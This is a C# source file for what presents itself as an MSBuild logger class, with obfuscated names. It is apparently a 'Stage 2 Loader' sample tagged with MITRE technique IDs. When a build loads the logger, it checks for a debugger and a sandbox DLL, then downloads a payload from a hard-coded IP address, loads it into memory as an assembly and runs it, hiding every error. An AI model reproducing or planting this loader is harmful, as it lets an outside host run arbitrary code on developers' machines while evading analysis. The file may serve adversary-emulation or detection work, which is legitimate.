using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
using Microsoft.Build.Framework;

public class xyfdgt : ILogger
{
    const string vbnmq = "http://100.111.22.117:8000";
    const string plkjh = "https://http://100.111.22.117:8000/stage/990/3?endpoint_id=10";
    const string zxcvb = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";
    const int asdfg = 990;
    const int qwert = 10;
    
    private string hgfdsw = Path.Combine(
        Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
        asdfg.ToString()
    );
    
    public void Initialize(IEventSource eventSource)
    {
        try
        {
            if (CheckEnvironment())
            {
                ExecuteFlow();
            }
        }
        catch
        {
        }
    }
    
    private bool CheckEnvironment()
    {
        try
        {
            if (System.Diagnostics.Debugger.IsAttached)
                return false;
                
            IntPtr moduleHandle = GetModuleHandle("SbieDll.dll");
            if (moduleHandle != IntPtr.Zero)
                return false;
                
            return true;
        }
        catch
        {
            return true;
        }
    }
    
    private void ExecuteFlow()
    {
        Thread.Sleep(2000);
        
        try
        {
            Directory.CreateDirectory(hgfdsw);
            string timestamp = DateTime.Now.ToString("yyyyMMddHHmmss");
            string logPath = Path.Combine(hgfdsw, $"{timestamp}-Log.txt");
            
            File.WriteAllText(logPath, $"[{DateTime.Now}][Stage 2 Loader-DLL Universal NET]: {qwert}-{asdfg}-T1105=1\n");
            
            byte[] stageData = PerformTransfer();
            
            if (stageData != null && stageData.Length > 0)
            {
                File.AppendAllText(logPath, $"[{DateTime.Now}][Stage 2 Loader-DLL Universal NET]: {qwert}-{asdfg}-T1620=1\n");
                ExecuteInMemory(stageData);
            }
            else
            {
                File.AppendAllText(logPath, $"[{DateTime.Now}][Stage 2 Loader-DLL Universal NET]: {qwert}-{asdfg}-T1105=0\n");
            }
        }
        catch (Exception ex)
        {
            try
            {
                string timestamp = DateTime.Now.ToString("yyyyMMddHHmmss");
                string logPath = Path.Combine(hgfdsw, $"{timestamp}-Log.txt");
                File.AppendAllText(logPath, $"[{DateTime.Now}][Stage 2 Loader-DLL Universal NET]: {qwert}-{asdfg}-T1105=0\n");
                File.AppendAllText(logPath, $"[{DateTime.Now}][Stage 2 Loader-DLL Universal NET]: {qwert}-{asdfg}-T1620=0\n");
            }
            catch
            {
            }
        }
    }
    
    private byte[] PerformTransfer()
    {
        try
        {
            using (WebClient client = new WebClient())
            {
                client.Headers.Add("User-Agent", zxcvb);
                return client.DownloadData(plkjh);
            }
        }
        catch
        {
            return null;
        }
    }
    
    private void ExecuteInMemory(byte[] assemblyData)
    {
        try
        {
            Assembly loadedAssembly = Assembly.Load(assemblyData);
            
            if (loadedAssembly.EntryPoint != null)
            {
                object[] parameters = new object[] { new string[0] };
                loadedAssembly.EntryPoint.Invoke(null, parameters);
            }
        }
        catch
        {
        }
    }
    
    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);
    
    public void Shutdown() { }
    public string Parameters { get; set; }
    public LoggerVerbosity Verbosity { get; set; }
}